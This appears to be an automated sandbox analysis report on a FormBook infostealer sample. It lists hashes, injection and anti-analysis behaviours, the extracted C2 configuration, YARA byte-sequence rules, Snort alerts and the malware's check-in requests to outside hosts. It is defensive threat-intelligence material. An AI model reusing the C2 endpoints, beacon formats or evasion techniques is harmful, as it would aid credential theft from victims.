Loading ...

Play interactive tourEdit tour

Analysis Report Order 122001-220 guanzo.exe

Overview

General Information

Sample Name:Order 122001-220 guanzo.exe
Analysis ID:412023
MD5:9e819bcc826e7a20b0fd139cc4185195
SHA1:bdb33c04403e308dcc79ced36201c577a40f0311
SHA256:5b09da58ac487c25237bf1a8ba98988af849980d5fe92dd1ca417591b977d7a8
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Order 122001-220 guanzo.exe (PID: 864 cmdline: 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe' MD5: 9E819BCC826E7A20B0FD139CC4185195)
    • Order 122001-220 guanzo.exe (PID: 5676 cmdline: C:\Users\user\Desktop\Order 122001-220 guanzo.exe MD5: 9E819BCC826E7A20B0FD139CC4185195)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 1556 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 4700 cmdline: /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjengineering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Order 122001-220 guanzo.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Order 122001-220 guanzo.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjengineering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Order 122001-220 guanzo.exeVirustotal: Detection: 62%Perma Link
          Source: Order 122001-220 guanzo.exeMetadefender: Detection: 32%Perma Link
          Source: Order 122001-220 guanzo.exeReversingLabs: Detection: 65%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Order 122001-220 guanzo.exeJoe Sandbox ML: detected
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Order 122001-220 guanzo.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Order 122001-220 guanzo.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 122001-220 guanzo.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.uuoouu-90.store/meub/
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1Host: www.comicstattoosnguns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goeseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1Host: www.thefrankversion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1Host: www.tjanyancha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1Host: www.dmowang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1Host: www.pocopage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goodcreditcardshome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1Host: www.pasteleriaruth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1Host: www.amesshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.216 198.54.117.216
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1Host: www.comicstattoosnguns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goeseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1Host: www.thefrankversion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1Host: www.tjanyancha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1Host: www.dmowang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1Host: www.pocopage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goodcreditcardshome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1Host: www.pasteleriaruth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1Host: www.amesshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.paperplaneexplorer.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 08:51:24 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672299597.0000000002541000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000002.932522691.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
